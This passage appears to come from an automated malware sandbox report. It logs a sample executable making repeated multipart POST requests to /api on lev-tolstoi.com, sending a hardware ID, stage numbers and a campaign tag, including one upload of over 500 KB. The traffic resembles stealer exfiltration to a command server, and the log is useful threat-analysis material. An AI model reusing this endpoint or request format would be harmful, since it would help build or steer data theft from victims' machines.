                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Set-Cookie: PHPSESSID=0n0b43ndq2cksj8fi0tgbc4bfq; expires=Wed, 23 Apr 2025 02:54:18 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                    vary: accept-encoding
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UDKE0sRsN%2BOxNggdS9Z7paQpKeE6w%2Bv5qQeQgaF3rq6%2BY8yTvK%2BVCYq211a9u7YxUfM42DyWIgIgzpkshN08SIy9KFvXR9b5ur0J%2BH9fLSvq9FEFPM00UA7lLreT2LksrNA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8f9066bc2d264239-EWR
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1601&min_rtt=1588&rtt_var=623&sent=13&recv=23&lost=0&retrans=0&sent_bytes=2835&recv_bytes=19123&delivery_rate=1719670&cwnd=232&unsent_bytes=0&cid=1356018074e2f3fc&ts=1084&x=0"
                                                                                                                                                                                                                                                    2024-12-28 09:07:40 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                    2024-12-28 09:07:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    4192.168.2.449735104.21.66.864437292C:\Users\user\Desktop\oe9KS7ZHUc.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-28 09:07:41 UTC270OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=IPWSOXIX
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Content-Length: 8730
                                                                                                                                                                                                                                                    Host: lev-tolstoi.com
                                                                                                                                                                                                                                                    2024-12-28 09:07:41 UTC8730OUTData Raw: 2d 2d 49 50 57 53 4f 58 49 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 42 43 34 43 30 41 42 45 46 43 45 33 35 39 38 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 49 50 57 53 4f 58 49 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 49 50 57 53 4f 58 49 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 49 50 57 53 4f 58 49 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
                                                                                                                                                                                                                                                    Data Ascii: --IPWSOXIXContent-Disposition: form-data; name="hwid"4BC4C0ABEFCE3598BEBA0C6A975F1733--IPWSOXIXContent-Disposition: form-data; name="pid"2--IPWSOXIXContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--IPWSOXIXContent-Di
                                                                                                                                                                                                                                                    2024-12-28 09:07:42 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Sat, 28 Dec 2024 09:07:42 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Set-Cookie: PHPSESSID=rv72tt2p1pbhl2n16i26aq22u6; expires=Wed, 23 Apr 2025 02:54:21 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                    vary: accept-encoding
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rR%2F7kdfgWLoiXj%2Bd5lBU02dy3kY%2Fs7jMhvBNVl3eehrc4gYWMXL%2BTmzaoYeWHLGwG7w3HB%2F92gtZz05eV1mHI8E84tUo%2BOWeS6fsXFDhKqdTdXE6b3eQdGuxUHNbLJOsMpI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8f9066cb9eeb43f2-EWR
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1591&min_rtt=1585&rtt_var=607&sent=8&recv=14&lost=0&retrans=0&sent_bytes=2835&recv_bytes=9658&delivery_rate=1785932&cwnd=207&unsent_bytes=0&cid=627c2680dcbd8e5e&ts=947&x=0"
                                                                                                                                                                                                                                                    2024-12-28 09:07:42 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                    2024-12-28 09:07:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    5192.168.2.449736104.21.66.864437292C:\Users\user\Desktop\oe9KS7ZHUc.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-28 09:07:44 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=GBAF1YQJCBG0OP3B
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Content-Length: 20431
                                                                                                                                                                                                                                                    Host: lev-tolstoi.com
                                                                                                                                                                                                                                                    2024-12-28 09:07:44 UTC15331OUTData Raw: 2d 2d 47 42 41 46 31 59 51 4a 43 42 47 30 4f 50 33 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 42 43 34 43 30 41 42 45 46 43 45 33 35 39 38 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 47 42 41 46 31 59 51 4a 43 42 47 30 4f 50 33 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 47 42 41 46 31 59 51 4a 43 42 47 30 4f 50 33 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63
                                                                                                                                                                                                                                                    Data Ascii: --GBAF1YQJCBG0OP3BContent-Disposition: form-data; name="hwid"4BC4C0ABEFCE3598BEBA0C6A975F1733--GBAF1YQJCBG0OP3BContent-Disposition: form-data; name="pid"3--GBAF1YQJCBG0OP3BContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic
                                                                                                                                                                                                                                                    2024-12-28 09:07:44 UTC5100OUTData Raw: 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00
                                                                                                                                                                                                                                                    Data Ascii: `M?lrQMn 64F6(X&7~`aO
                                                                                                                                                                                                                                                    2024-12-28 09:07:45 UTC1126INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Sat, 28 Dec 2024 09:07:45 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Set-Cookie: PHPSESSID=5lnapdpfkef7hmqef6o6t7aoh6; expires=Wed, 23 Apr 2025 02:54:23 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                    vary: accept-encoding
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ubrN7FNPsP6xLk0fsusTt6W9hwmhzjgBFnSLDX2keuJzyO5DfV3IeaoryGgOWQxu6YOHZrmOL8jRb6LfFV4H%2BijSUkRw6HcB3l%2BQeJiEvHuGNh98iGD5saXB25wThGGzveI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8f9066da88430f4d-EWR
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1496&min_rtt=1489&rtt_var=572&sent=15&recv=27&lost=0&retrans=0&sent_bytes=2836&recv_bytes=21390&delivery_rate=1888745&cwnd=217&unsent_bytes=0&cid=f1ac79712abb774f&ts=1191&x=0"
                                                                                                                                                                                                                                                    2024-12-28 09:07:45 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                    2024-12-28 09:07:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    6192.168.2.449738104.21.66.864437292C:\Users\user\Desktop\oe9KS7ZHUc.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-28 09:07:47 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=U17H3DRUP7LQTD212P
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Content-Length: 1261
                                                                                                                                                                                                                                                    Host: lev-tolstoi.com
                                                                                                                                                                                                                                                    2024-12-28 09:07:47 UTC1261OUTData Raw: 2d 2d 55 31 37 48 33 44 52 55 50 37 4c 51 54 44 32 31 32 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 42 43 34 43 30 41 42 45 46 43 45 33 35 39 38 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 55 31 37 48 33 44 52 55 50 37 4c 51 54 44 32 31 32 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 55 31 37 48 33 44 52 55 50 37 4c 51 54 44 32 31 32 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54
                                                                                                                                                                                                                                                    Data Ascii: --U17H3DRUP7LQTD212PContent-Disposition: form-data; name="hwid"4BC4C0ABEFCE3598BEBA0C6A975F1733--U17H3DRUP7LQTD212PContent-Disposition: form-data; name="pid"1--U17H3DRUP7LQTD212PContent-Disposition: form-data; name="lid"LOGS11--LiveT
                                                                                                                                                                                                                                                    2024-12-28 09:07:49 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Sat, 28 Dec 2024 09:07:48 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Set-Cookie: PHPSESSID=ovu9c5t1ht0q4ml596te83t7ec; expires=Wed, 23 Apr 2025 02:54:27 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                    vary: accept-encoding
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tk%2FNLFTdICMCrTsO9U0kEJXk64dldOxctdY1YScikYAghhRGVELHjt%2FFVmqEGWY3FfUsYn%2B%2FXlZsPklOE7IhxrW9aXYWseNmB1v3NhhWLRLxJyh0DauO9K%2BEqyfNq%2FlaUJg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8f9066ef2f5c434a-EWR
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1564&min_rtt=1557&rtt_var=599&sent=7&recv=9&lost=0&retrans=0&sent_bytes=2834&recv_bytes=2177&delivery_rate=1803582&cwnd=228&unsent_bytes=0&cid=d4889b764da1e585&ts=1923&x=0"
                                                                                                                                                                                                                                                    2024-12-28 09:07:49 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                    2024-12-28 09:07:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    7192.168.2.449742104.21.66.864437292C:\Users\user\Desktop\oe9KS7ZHUc.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-28 09:07:50 UTC283OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=TJX8WT39OB66U6CGIPK
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Content-Length: 571486
                                                                                                                                                                                                                                                    Host: lev-tolstoi.com
                                                                                                                                                                                                                                                    2024-12-28 09:07:50 UTC15331OUTData Raw: 2d 2d 54 4a 58 38 57 54 33 39 4f 42 36 36 55 36 43 47 49 50 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 42 43 34 43 30 41 42 45 46 43 45 33 35 39 38 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 54 4a 58 38 57 54 33 39 4f 42 36 36 55 36 43 47 49 50 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 54 4a 58 38 57 54 33 39 4f 42 36 36 55 36 43 47 49 50 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69
                                                                                                                                                                                                                                                    Data Ascii: --TJX8WT39OB66U6CGIPKContent-Disposition: form-data; name="hwid"4BC4C0ABEFCE3598BEBA0C6A975F1733--TJX8WT39OB66U6CGIPKContent-Disposition: form-data; name="pid"1--TJX8WT39OB66U6CGIPKContent-Disposition: form-data; name="lid"LOGS11--Li
                                                                                                                                                                                                                                                    2024-12-28 09:07:50 UTC15331OUTData Raw: 10 03 f2 9a 63 f7 0b 01 65 f2 6f ac 7a 65 c9 82 cb b0 f6 ea 53 c1 0a 9f ff 1c 30 40 69 be fe 48 6f a8 9b 20 b3 be 32 58 c1 98 51 9b 5d 09 20 f0 f5 50 6a 76 dc a1 54 51 20 3f 0f e5 bc 87 b3 11 98 e8 21 00 4e a9 63 61 1c 1b bb 61 8b 8e cc 16 5a df cf f6 12 01 8f 03 e6 6d d1 20 b2 6a a1 e3 25 1f 3d 46 38 f5 7f 51 fe ff be 9c 07 cc cb d9 50 9f 00 90 8c 81 9d 16 20 46 b1 00 10 61 18 36 1a a3 b1 fe 29 cc 22 93 00 11 14 7b 0f 22 27 e3 e1 1d 93 88 57 39 b9 28 f8 a2 06 5d 0a 94 1e 34 a9 ee e1 07 c9 06 1b b7 a3 71 a4 7d 16 d5 7e 68 5d 3b 10 b5 97 e3 e5 c1 98 5e 4f d4 43 cb dc 8f 60 c8 e5 6b 32 6b 36 d0 82 f5 3b f2 27 7f 75 da b3 3f 7b ca 46 dd 4c d2 a6 56 41 47 0a bd a0 9c 0e f6 57 2f 1f 9e 4b 2f 09 83 34 fd ed 94 85 66 fd f9 f8 5a f9 0d c5 69 83 c8 85 8b a6 63 eb
                                                                                                                                                                                                                                                    Data Ascii: ceozeS0@iHo 2XQ] PjvTQ ?!NcaaZm j%=F8QP Fa6)"{"'W9(]4q}~h];^OC`k2k6;'u?{FLVAGW/K/4fZic
                                                                                                                                                                                                                                                    2024-12-28 09:07:50 UTC15331OUTData Raw: 63 b7 32 8e c2 62 60 59 ba e5 4f f1 3d 85 7f 7f ef d4 e7 82 8d d2 dd b1 02 0c a7 a7 e8 2e 33 44 ee 36 19 52 1e b2 24 1c 68 42 db 43 6a 41 38 77 63 66 08 37 99 87 13 46 02 6f 27 63 9e 2b 14 eb fa e5 ee 7e af bf b5 eb 98 42 d2 3c 22 01 2b 2c 73 7a b3 3f 61 9f 89 d8 c8 45 95 83 dd 83 2c 52 ca 1e 85 40 4e 31 33 06 49 4e dd 0f a7 0b 1a 35 d3 a4 a0 71 bd 06 f2 fb 23 8d 26 49 ab 48 c7 5a 89 c0 24 49 2b 8e f3 23 98 f9 da 97 83 89 01 7d 78 db 9c 24 b0 92 19 46 9a 79 ce 47 9a 98 5e 1f ab 31 a9 e2 94 ee 4f a7 77 69 6f 4d 9f a0 0c 36 1d e1 33 2d 95 aa 18 17 77 b2 b1 5d 37 9d 78 dc c1 6d 8a f8 33 f7 31 aa 5e 92 74 76 d1 52 93 93 e1 ad af 12 8c d0 b9 cf b5 9e 9e ac 97 25 d6 72 d1 55 23 1d 60 37 e6 99 97 4d 9b 09 2f 45 23 91 73 75 46 dd 93 5d cc 34 6f 33 95 5c 42 60 c3
                                                                                                                                                                                                                                                    Data Ascii: c2b`YO=.3D6R$hBCjA8wcf7Fo'c+~B<"+,sz?aE,R@N13IN5q#&IHZ$I+#}x$FyG^1OwioM63-w]7xm31^tvR%rU#`7M/E#suF]4o3\B`
                                                                                                                                                                                                                                                    2024-12-28 09:07:50 UTC15331OUTData Raw: f8 5d e6 c1 4d 58 16 33 78 24 c6 2f dd f8 5d 5f 10 f5 91 1b a3 8c 37 6c 9e 2f 3a 36 74 1c 18 a9 19 81 6c 15 8c aa 41 de 30 df 25 5c 92 eb 92 29 c4 9c 72 25 1a f8 a9 2e 1b 03 67 27 8c 25 30 a2 db 6d a5 fd 2e c7 31 7f fd 0e 9b 92 24 49 cc 7c 7d ec 05 38 a6 87 fb 8d 4f 3e 17 ba fc 7b 35 44 cf ba 47 4f 37 15 2d 0a ec d8 45 55 79 9b 02 fc cc 9b 96 9c 1e ea 0b f6 f3 7f 19 11 6f 8d f5 1c ee 49 21 a6 ca 64 c7 3f 06 f1 5e 4c 57 41 8b d4 a8 7b d2 99 3e 98 db e7 4e b1 03 f5 57 2d 83 07 c7 1c 0e 47 57 ac 6f e4 9d e4 6d 18 96 ee 7a c2 33 df 22 11 ae 48 e2 5e 38 7e d1 2e 22 48 78 eb b7 f6 23 e0 f2 43 b9 05 5a b4 d0 d1 3b 85 60 9c c0 ab 3f 74 3d 7e 8a c1 e8 6b e1 89 19 ee 81 e3 b8 1b c5 dd 27 59 02 5b 87 19 0e db 4a 13 6c 77 63 8e 60 e1 d2 6b 22 6c 7b 6c 9f ba df ef 54
                                                                                                                                                                                                                                                    Data Ascii: ]MX3x$/]_7l/:6tlA0%\)r%.g'%0m.1$I|}8O>{5DGO7-EUyoI!d?^LWA{>NW-GWomz3"H^8~."Hx#CZ;`?t=~k'Y[Jlwc`k"l{lT
                                                                                                                                                                                                                                                    2024-12-28 09:07:50 UTC15331OUTData Raw: 74 23 20 0e 59 2f 75 54 3b 63 f1 7c fd 50 52 1d 09 55 fb b8 d2 24 40 56 e3 91 e8 b1 81 b0 a3 57 ab 36 9c 97 35 87 89 c6 7a 34 75 d8 7d 5b 60 24 f8 8e 68 ff ff b6 62 de ff c7 85 4c 81 c8 d2 18 05 74 68 18 ce c3 1d 90 2f 72 79 e4 ce d7 94 ee 8b a1 96 e2 c3 55 c0 c3 cb 6a 74 93 b3 ba bd ff b2 c6 21 da 5e 6c 86 3c a3 ec ee fb 74 56 83 fc 04 b7 25 40 10 dd 75 7c 5d 85 a9 be b2 7d 66 8d 0c 26 40 40 fe ea 92 d3 31 bd a6 0d 25 d9 0c 83 90 87 7b 69 99 d9 05 69 17 49 ce 7d 14 8e 9d 62 eb d7 ff a0 d6 2f bb 32 3b 9d 84 20 99 81 e0 7b 4c 19 a7 8d 6b 4e e9 11 21 fe cd 44 9a ee 69 58 6c a9 64 85 85 c3 fc e6 6e 52 53 6e 59 d1 19 03 97 27 13 27 98 a3 62 76 4c 7e 7d a2 35 87 60 f9 db d6 d8 0f 76 cd 8b 61 cb 20 23 55 28 7b 8e fa dc e8 58 9a 19 d6 ce c6 11 75 3b 59 29 44 1a
                                                                                                                                                                                                                                                    Data Ascii: t# Y/uT;c|PRU$@VW65z4u}[`$hbLth/ryUjt!^l<tV%@u|]}f&@@1%{iiI}b/2; {LkN!DiXldnRSnY''bvL~}5`va #U({Xu;Y)D
                                                                                                                                                                                                                                                    2024-12-28 09:07:50 UTC15331OUTData Raw: a1 b5 b7 ed 03 24 4e 6c e5 a4 ee ce 62 0c 29 3d 7d 28 7b 73 d4 8c 77 5b 37 22 14 09 ee d6 24 89 fb f1 29 89 1a 98 d3 97 b3 3d 00 15 8f 4a bb 09 bc b6 5b 40 0a 73 77 10 0b 12 31 0d 01 a5 e5 d4 db 1c a0 2f 0a 76 26 82 8e a7 f0 5e 7e 70 b4 64 99 97 d1 e2 39 4d 00 bd a2 30 61 ab 17 82 85 b6 cf 0b ec 76 f1 0b 3a 89 2e ca 17 ed 6e 06 6e cf fe 74 ed 03 e6 c3 ce 5f 76 a6 2f cf 0c ec 34 1a a9 1a 7c 66 3e ad 88 97 91 a6 a4 6b ac 4a 74 9f 1d 08 ee e4 6f 3c 99 52 13 4c a6 54 8b a5 99 f5 4c 29 36 4f ad 9b b2 1e c1 d5 fb 51 dc 89 d2 19 e9 4f 42 2d 41 ae 32 0b cc 59 12 ae 4e 6e 22 26 00 c5 20 64 58 6a 88 b7 6a 23 ef c0 c2 51 15 65 f0 13 6b 0c 8c 99 46 20 46 64 11 df 7f 2f 46 a1 c1 ab f0 49 6d f5 4d 66 c8 9f f5 f0 52 81 6d 08 a5 c1 f9 bc 98 68 52 93 2a 44 eb 46 11 b5 6c
                                                                                                                                                                                                                                                    Data Ascii: $Nlb)=}({sw[7"$)=J[@sw1/v&^~pd9M0av:.nnt_v/4|f>kJto<RLTL)6OQOB-A2YNn"& dXjj#QekF Fd/FImMfRmhR*DFl
